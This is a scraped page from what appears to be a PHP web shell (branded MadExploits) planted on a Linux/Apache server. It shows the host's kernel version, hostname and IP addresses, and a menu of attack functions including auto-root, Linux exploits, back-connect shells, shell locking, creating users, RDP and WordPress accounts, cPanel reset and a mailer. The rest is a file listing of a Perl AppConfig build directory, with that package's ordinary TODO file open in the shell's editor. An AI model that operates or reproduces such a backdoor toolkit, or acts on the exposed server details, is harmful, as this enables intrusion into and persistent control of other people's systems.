Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.14
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
.cpanplus /
5.16.3 /
build /
AppConfig-1.71 /
[ HOME SHELL ]
Name
Size
Permission
Action
blib
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
Changes
5.61
KB
-rw-r--r--
LICENSE
19.74
KB
-rw-r--r--
MANIFEST
530
B
-rw-r--r--
META.json
1.25
KB
-rw-r--r--
META.yml
676
B
-rw-r--r--
MYMETA.json
1.25
KB
-rw-r--r--
MYMETA.yml
676
B
-rw-r--r--
Makefile
30.73
KB
-rw-r--r--
Makefile.PL
1.8
KB
-rw-r--r--
README
554
B
-rw-r--r--
TODO
1.98
KB
-rw-r--r--
pm_to_blib
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TODO
#============================================================================ # # TODO # # List of outstandings bugs, features and ideas for AppConfig::* modules. # Please note that the thoughts expressed here do not necessarily imply # any guaranteed future functionality of AppConfig. Please contact the # author if you wish to help implement anything here. All help is welcome, # but do check first to make sure someone isn't already tackling the item # in question. Any other suggestions, ideas, patches gratefully received. # # Written by Andy Wardley <abw@cre.canon.co.uk> # # Copyright (C) 1997,1998 Canon Research Centre Europe Ltd. # All Rights Reserved. # #---------------------------------------------------------------------------- # # $Id: TODO,v 1.1.1.1 1999/09/14 16:39:44 abw Exp $ # #============================================================================ *** IMPORTANT *** * change varlist() to varhash() AppConfig::State * Perhaps allow a callback to be installed which is called *instead* of the get() and set() methods (or rather, is called by them). * CASE sensitivity may be required on a per-operation basis. E.g. CASE sensitive for AppConfig::Args but CASE insensitive for AppConfig::File. * AppConfig::State may need to have CMDARG re-introduced. When using blocks, it will be considerably more convenient to say '-v' rather than -block_verbose. The global CMDARG could be a template of the form '%c', to indicate the first character, for example. #------------------------------------------------------------------------ General * Change _pedantic() and _debug() calls in AppConfig::* constructors to direct $state->{ XXX } lookups. We are friends, after all and the current approach is likely to be rather inefficient. #------------------------------------------------------------------------ Test Suite * Modify file expansion tests to determine if getpwnam() etc are working or not. #------------------------------------------------------------------------
Close